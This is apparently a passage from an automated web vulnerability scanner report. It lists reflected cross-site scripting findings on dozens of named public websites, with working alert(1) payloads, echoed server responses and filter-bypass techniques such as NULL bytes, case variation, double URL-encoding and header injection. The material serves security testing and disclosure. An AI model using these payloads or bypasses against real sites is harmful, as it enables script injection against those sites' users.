http://www.jobcentral.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb07"><script>alert(1)</script>7bf12fb657b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29783 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:48:57 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Jobs not ads | Direct Employers Job Search Engine | JobCentral</title> ...[SNIP]... <a href="/index.asp?4fb07"><script>alert(1)</script>7bf12fb657b=1&adv=1" title="Add Advanced fields"> ...[SNIP]...
2.32. http://www.k12jobspot.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.k12jobspot.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 106fd'-alert(1)-'caca1b64cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.33. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ktvb.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e370f"-alert(1)-"013fb82cd55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.34. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ktvb.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2575c"><script>alert(1)</script>adfdf415058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.35. http://www.lef.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lef.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef0aa"-alert(1)-"cd85f2fc75d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Highest Qua ...[SNIP]... <script language="javascript" type="text/javascript"> var WebSiteBaseURL = "http://www.lef.org" var ThisPageFullURL = "http://www.lef.org/?ef0aa"-alert(1)-"cd85f2fc75d=1" </script> ...[SNIP]...
2.36. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lyricsbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61b95"-alert(1)-"981aff1907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:56:56 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 15:56:56 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 16046
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics</TITLE> <META http-equiv="content-type" content="text/html;charset=iso-8859-1"> <META name=description ...[SNIP]... <script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.lyricsbox.com/?61b95"-alert(1)-"981aff1907e=1",c5:"",c6:"",c15:""});</script> ...[SNIP]...
2.37. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lyricsbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d840"><script>alert(1)</script>4546c14a081 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:56:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 02 Apr 2011 15:56:37 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 16076
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics</TITLE> <META http-equiv="content-type" content="text/html;charset=iso-8859-1"> <META name=description ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.lyricsbox.com/?9d840"><script>alert(1)</script>4546c14a081=1&c5=&c6=&c15=&cj=1"/> ...[SNIP]...
2.38. http://www.mobile9.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mobile9.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/ht ...[SNIP]... <a href="http://www.mobile9.com/?31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744=1&lang=cn"> ...[SNIP]...
2.39. http://www.musicloversgroup.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.musicloversgroup.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42eb8"><script>alert(1)</script>c27d8eead00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42eb8\"><script>alert(1)</script>c27d8eead00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://www.musicloversgroup.com/page/2/?42eb8\"><script>alert(1)</script>c27d8eead00=1" title="2 "> ...[SNIP]...
2.40. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.networkworld.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e505'-alert(1)-'f0b10da86c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.41. http://www.newhomesource.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.newhomesource.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c58d"><script>alert(1)</script>f0bcbad861f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.42. http://www.onlyteensvids.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.onlyteensvids.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14fcc"-alert(1)-"34a2a57f157 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.43. http://www.overthumbs.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.overthumbs.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7187b"><script>alert(1)</script>92b484c0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript" langu ...[SNIP]... <a href="/?7187b"><script>alert(1)</script>92b484c0150=2/"> ...[SNIP]...
2.44. http://www.pnwlocalnews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pnwlocalnews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dcd"><script>alert(1)</script>b28e226b8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.45. http://www.pointstreak.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pointstreak.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae46c"><script>alert(1)</script>ffbc06d52b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a PHP/5.2.11 X-Powered-By: PHP/5.2.11 P3P: CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR BUS IND PHY UNI COM NAV INT" Expires: Sat, 02-Apr-11 15:43:26 GMT Last-Modified: Sat, 02 Apr 2011 15:41:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 63634 be: hockey vclhockey: 1 Date: Sat, 02 Apr 2011 15:41:28 GMT X-Varnish: 3922358727 Age: 0 Via: 1.1 varnish Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.pointstreak.com/?ae46c"><script>alert(1)</script>ffbc06d52b0=1"/> ...[SNIP]...
2.46. http://www.puma.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.puma.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93193"><script>alert(1)</script>fc4cc35bcda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.47. http://www.rd.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rd.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a12c</script><script>alert(1)</script>5b92e3406d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.48. http://www.recipelion.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.recipelion.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a01"><script>alert(1)</script>95cb7b9b1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.49. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rheumatologychannel.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcaac'-alert(1)-'588c71dd588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.50. http://www.rheumatologychannel.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.rheumatologychannel.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e76"><a>c99028ccb1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.51. http://www.securelinkcorp.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.securelinkcorp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b91b<script>alert(1)</script>5ac33727974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>Test JSP page</title> </head> <body bgcolor=white> <table border="0"> <tr> <td> <h1>Sample Application JSP Page</h1> This is the output of a JSP page that is part of the ...[SNIP]... <td align="left">3b91b<script>alert(1)</script>5ac33727974=1</td> ...[SNIP]...
2.52. http://www.selectsips.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.selectsips.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d948a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecec1537ff92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d948a"><script>alert(1)</script>cec1537ff92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
2.53. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slack-time.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8035"-alert(1)-"041f347b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "http://www.slack-time.com/?e8035"-alert(1)-"041f347b4e=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
2.54. http://www.slack-time.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slack-time.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10219"><script>alert(1)</script>67eb9ac865a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=http://www.slack-time.com/?10219"><script>alert(1)</script>67eb9ac865a=1&c5=&c6=&c15=&cj=1" /> ...[SNIP]...
2.55. http://www.spamfighter.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.spamfighter.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e39"><script>alert(1)</script>a2971b9f62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.56. http://www.suny.edu/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.suny.edu
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e937"><script>alert(1)</script>a1544f91b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Sat, 02 Apr 2011 16:10:24 GMT Server: Microsoft-IIS/6.0 IISExport: This web site was exported using IIS Export v4.2 IISExport: This web site was exported using IIS Export v4.2 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.57. http://www.teenspot.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.teenspot.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22954"><script>alert(1)</script>c68812124b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<HTML><HEAD> <TITLE>TeenSpot.com - offers teen chat rooms, message boards, profiles, music, movies, and blogs.</TITLE> <META name="description" content="Offers teen chat rooms, message boards, p ...[SNIP]... <a href="http://www.teenspot.com/?22954"><script>alert(1)</script>c68812124b4=1&vo=6" target="_self"> ...[SNIP]...
2.58. http://www.teleprofitsnow.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.teleprofitsnow.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be64"style%3d"x%3aexpression(alert(1))"cdfb73ef9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be64"style="x:expression(alert(1))"cdfb73ef9b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 11977 Content-Type: application/xhtml+xml; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="DSP NON CUR OUR STP NAV COM STA UNI" Date: Sat, 02 Apr 2011 15:20:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> This Call Can ...[SNIP]... <input name="Contact0_referrerURL" type="hidden" value="http://www.teleprofitsnow.com/default.aspx?1be64"style="x:expression(alert(1))"cdfb73ef9b5=1" /> ...[SNIP]...
2.59. http://www.trekbikes.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.trekbikes.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50712"-alert(1)-"3b2cb68c3da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Sat, 02 Apr 2011 15:30:03 GMT Server: Apache/2 X-Powered-By: PHP/5.3.3 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 15:30:03 GMT server-id: atlcfiweb02 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
2.60. http://www.ub.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.ub.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9b9"><a>2571ca6bec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.61. http://www.uci.edu/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uci.edu
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faaf9"><script>alert(1)</script>5555b47234a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>University of California, Irvine</title ...[SNIP]... <a href="?faaf9"><script>alert(1)</script>5555b47234a=1&theme=0"> ...[SNIP]...
2.62. http://www.usedcars.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.usedcars.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae949"style%3d"x%3aexpression(alert(1))"e0ddab0b7d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae949"style="x:expression(alert(1))"e0ddab0b7d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
2.63. http://www.viagra.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.viagra.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8206d'-alert(1)-'06086a87a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head> <title> VI ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='http://www.viagra.com/index.aspx?8206d'-alert(1)-'06086a87a73=1'; s.pageType=''; s.prop1='home'; s.prop3='home:viagra'; s.prop5=''; /* Conversion Variables */ s.campaign=''; s.events='7:pageview'; s.eVar3='home:viagra'; s.eVar5=''; s.eVar6=''; s.eVar18=''; s.eVa ...[SNIP]...
2.64. http://www.visitlasvegas.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.visitlasvegas.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e85f7--><script>alert(1)</script>27040fdae7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
2.65. http://www.worldstart.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.worldstart.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6f98"><script>alert(1)</script>f7d2674b206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f6f98\"><script>alert(1)</script>f7d2674b206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <input type="hidden" name="location" value="http://www.worldstart.com/?f6f98\"><script>alert(1)</script>f7d2674b206=1" /> ...[SNIP]...
2.66. http://www.yankodesign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.yankodesign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445df"><script>alert(1)</script>131a4f6060e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 445df\"><script>alert(1)</script>131a4f6060e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55293'-alert(1)-'1523160a494 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload e6ebf--><script>alert(1)</script>4d07ef56e0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a606'-alert(1)-'7b0131398cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
